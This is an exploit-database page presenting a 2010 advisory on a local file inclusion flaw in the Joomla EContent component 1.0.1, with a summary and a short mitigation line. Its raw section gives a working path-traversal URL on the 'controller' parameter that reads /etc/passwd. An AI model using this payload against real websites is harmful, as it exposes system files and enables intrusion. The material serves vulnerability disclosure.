header-logo
Suggest Exploit
vendor:
EContent
by:
Chip D3 Bi0s
N/A
CVSS
N/A
Local File Inclusion
98
CWE
Product Name: EContent
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:econtent:econtent:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component EContent Local File Inclusion

A vulnerability exists in EContent Joomla Component version 1.0.1 which allows an attacker to include a local file by manipulating the 'controller' parameter in a GET request. An attacker can exploit this vulnerability to include a local file, such as the /etc/passwd file, and view its contents.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file operation.
Source

Exploit-DB raw data:

---------------------------------------------------------------------------------
Joomla Component EContent Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: EContent
version		: 1.0.1
Developer	: E-Content
website		: http://www.econtentsite.com/
License		: GPL            type  : Non-Commercial
Date Added	: 24 March 2010
Download	: http://www.econtentsite.com/



Description     :

If you are looking a way to add new/fresh content to your Joomla website,
without having to write a new article everyday, then E-Content Joomla
Component is the solution for you!

As we know articles is very important for business, especially for Internet
Marketing Business. You need to continually write unique and quality articles
to keep the attention of visitors and search engines.

E-Content allows you to automatically collect RSS feed, HTML page content items
and have each item inserted as an Joomla article in the section and category
you define. The content of the article will vary based on the specific page you
select.


--------------
file error	: components/com_econtent/econtent.php

how to exploit

http://127.0.0.1/index.php?option=com_econtent&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Navigation

Suggest Exploit

Services By CQR